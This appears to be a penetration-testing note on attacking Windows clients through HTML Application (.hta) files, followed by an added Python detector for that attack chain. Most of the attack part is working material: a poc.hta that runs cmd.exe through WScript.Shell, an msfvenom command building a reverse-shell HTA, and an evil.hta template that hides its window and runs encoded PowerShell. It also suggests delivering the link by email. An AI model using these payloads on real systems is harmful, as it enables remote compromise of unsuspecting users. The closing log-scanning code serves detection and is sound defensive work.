ActiveXObject to Wscript RCE

In this example, we will leverage ActiveXObjects, which can (dangerously) provide access to underlying operating system commands. This is done through the Windows Script Host (WScript) functionality, in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its Run method to launch an application on the target client machine.

--------------------poc.hta--------------------

<script>
// Launch cmd.exe through the WScript.Shell Run method, then close the mshta window
var c = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(c);
self.close();
</script>

We can save this and serve it with Apache. This will open cmd on the user's computer. The user will be prompted with:

then, if they click to open it, they will get:

This second message appears when the Internet Explorer sandbox "Protected Mode" is turned on (the default). mshta.exe will also have its own cmd prompt open, which is why we close it after we launch our window/process.

RCE:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

(this format is hta-2-powershell)

-nop is shorthand for -NoProfile, which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user's profile scripts, which might negatively impact the execution of our code.

-w hidden (shorthand for -WindowStyle hidden) hides the PowerShell window.

The -e flag (shorthand for -EncodedCommand) allows us to supply a Base64-encoded PowerShell script directly as a command line argument.

----------------- evil.hta-----------------

<html>
<head>
<script language="VBScript">
' Move the HTA window off-screen so the user does not see it
window.moveTo -4000, -4000
' msfvenom randomises these variable names
Set iKqr8BWFyuiK = CreateObject("Wscript.Shell")
Set t6tI2tnp = CreateObject("Scripting.FileSystemObject")
' Locate powershell.exe via %PSModulePath% and run the encoded command from it
For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";")
  If t6tI2tnp.FileExists(path + "\..\powershell.exe") Then
    iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT_YOUR_BASE64_ENCODED_COMMAND_HERE"
  End If
Next
</script>
</head>
<body>
<script>
self.close();
</script>
</body>
</html>

----------------------- Then open a listener and wait for the user to trigger it -----------------

Since the link to the HTML Application can be delivered via email, we can even compromise NAT’d internal clients.
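From the detection side, the chain above leaves a very recognisable trace: mshta.exe as the parent of cmd.exe or powershell.exe, the latter with -nop -w hidden -e and a Base64 argument. The following is an added example (not part of the original notes) that scans constructed, simplified Sysmon-style process-creation lines ("ParentImage|Image|CommandLine") for that pattern and decodes the -EncodedCommand payload (Base64 of UTF-16LE) so an analyst can read it without executing it; the log format and sample lines are assumptions for the example.

```python
import base64

# Constructed sample process-creation events in a simplified Sysmon Event ID 1 shape:
# "ParentImage|Image|CommandLine". Made up for this example, not real telemetry.
DEMO_ENCODED = base64.b64encode("Write-Host demo".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|C:\Windows\System32\cmd.exe|cmd.exe",
    r"C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -nop -w hidden -e " + DEMO_ENCODED,
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe",
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|powershell.exe -File C:\scripts\backup.ps1",
]

# Children that a WScript.Shell Run() call inside an HTA typically spawns under mshta.exe.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def decode_encoded_command(cmdline):
    """Return the clear-text -EncodedCommand payload (Base64 of UTF-16LE),
    or None if the flag is absent or its argument is malformed."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_event(line):
    """Flag a shell spawned by mshta.exe; return a finding dict, or None for benign events."""
    parent, image, cmdline = line.split("|", 2)
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    child_name = image.rsplit("\\", 1)[-1].lower()
    if parent_name != "mshta.exe" or child_name not in SHELL_CHILDREN:
        return None
    lowered = cmdline.lower().split()
    return {
        "child": child_name,
        "noprofile": bool({"-nop", "-noprofile"} & set(lowered)),
        "hidden": "hidden" in lowered,  # covers -w hidden / -WindowStyle hidden
        "decoded": decode_encoded_command(cmdline),
    }


def scan(events):
    """Run analyze_event over a batch of log lines and keep only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f is not None]
```

Note that the Protected Mode prompt shown earlier is the user's only warning; on the endpoint, the mshta.exe parent relationship is the reliable signal, whereas the -nop/-w hidden/-e flags are just corroborating detail.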
